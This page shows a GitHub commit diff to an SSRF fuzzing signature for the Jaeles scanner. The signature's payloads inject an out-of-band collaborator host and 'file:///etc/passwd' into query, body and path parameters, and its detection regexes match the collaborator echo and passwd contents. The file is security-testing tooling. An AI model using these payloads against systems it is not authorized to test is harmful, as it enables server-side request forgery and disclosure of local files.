Skip to content

Commit

Permalink
Update ssrf.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
ghsec committed Dec 21, 2020
1 parent 6ff4ea0 commit 59738d8
Showing 1 changed file with 7 additions and 6 deletions.
13 changes: 7 additions & 6 deletions fuzz/common/ssrf.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -3,23 +3,24 @@ type: fuzz
info:
name: SSRF
risk: High

author: "@GochaOqradze"

# jaeles scan -p 'dest=xx.burpcollaborator.net' ...
params:
- dest: '{{.oob}}'

payloads:
- "http://{{.dest}}"
- "{{.dest}}/ssrf.txt"
- "{{.dest}}"
- "http://{{.Domain}}.{{.dest}}/{{.URL}}"
- "https://{{.Domain}}.{{.dest}}/{{.URL}}"
- "file:///etc/passwd"

requests:
- redirect: true
- generators:
- Query("{{.payload}}")
- Body("{{.payload}}")
- Path("{{.payload}}", "*")

- detections:
- >-
StringSearch("response", "ssrfhere")
RegexSearch("Resbody", "(?m)<html><body>[a-z0-9]+</body>|root:[x*]:0:0:")

0 comments on commit 59738d8

Please sign in to comment.